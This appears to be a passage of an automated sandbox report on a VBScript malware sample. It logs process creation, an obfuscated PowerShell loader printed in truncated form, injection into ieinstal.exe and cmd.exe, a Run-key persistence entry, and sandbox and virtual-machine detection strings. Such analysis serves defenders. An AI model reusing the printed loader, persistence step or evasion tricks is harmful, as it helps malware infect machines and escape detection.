Source:	Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.461606814.000000002254E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.460018382.00000000223AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.461606814.000000002254E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.460018382.00000000223AA000.00000004.00000020.00020000.00000000.sdmp, cmd.exe
Source:	Binary string: cmd.pdb source: ieinstal.exe, ieinstal.exe, 0000000D.00000002.535523454.0000000022600000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.497250107.0000000022501000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powersHell "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTS", "0")

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_2255090D push ecx; ret	13_3_22550920
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_22550921 push ecx; ret	13_3_22550934
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0302D0D1 push ecx; ret	17_2_0302D0E4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B19B31 push ecx; iretd	17_2_02B19B32
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B071AA push ebp; retf	17_2_02B071CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C132 push esi; retf	17_2_02B1C133
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1968D push ebp; retf	17_2_02B196A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B196F6 pushad ; retf	17_2_02B196F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B20F30 push dword ptr [13BF609Ch]; ret	17_2_02B20F51
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1BD59 pushfd ; retf	17_2_02B1BD5C

Source: C:\Windows\SysWOW64\cmd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LLXTPL6			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LLXTPL6			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Source: C:\Windows\System32\wscript.exe TID: 5136	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5788	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 5820	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 5820	Thread sleep time: -62000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 13_2_22736A60 rdtscp

13_2_22736A60

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3892	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 731	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 725	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_02B131C0 FindFirstFileW,FindNextFileW,FindClose,

17_2_02B131C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

System information queried: ModuleInformation

Jump to behavior

Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: wscript.exe, 00000000.00000003.265778080.0000026B15511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266172857.0000026B15513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.266860344.0000026B15513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265284479.0000026B154E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.258170078.0000026B154F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265588746.0000026B154F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000000.00000003.265653737.0000026B17375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: wscript.exe, 00000000.00000003.265653737.0000026B17375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}O
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: wscript.exe, 00000000.00000003.266039874.0000026B17369000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.258588650.0000026B17369000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265026295.0000026B17369000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256705348.0000026B17375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259335492.0000026B17375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265026295.0000026B17375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.267192402.0000026B17375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256705348.0000026B17369000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259335492.0000026B17369000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265922370.0000026B17375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265653737.0000026B17369000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: wscript.exe, 00000000.00000003.265653737.0000026B17375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
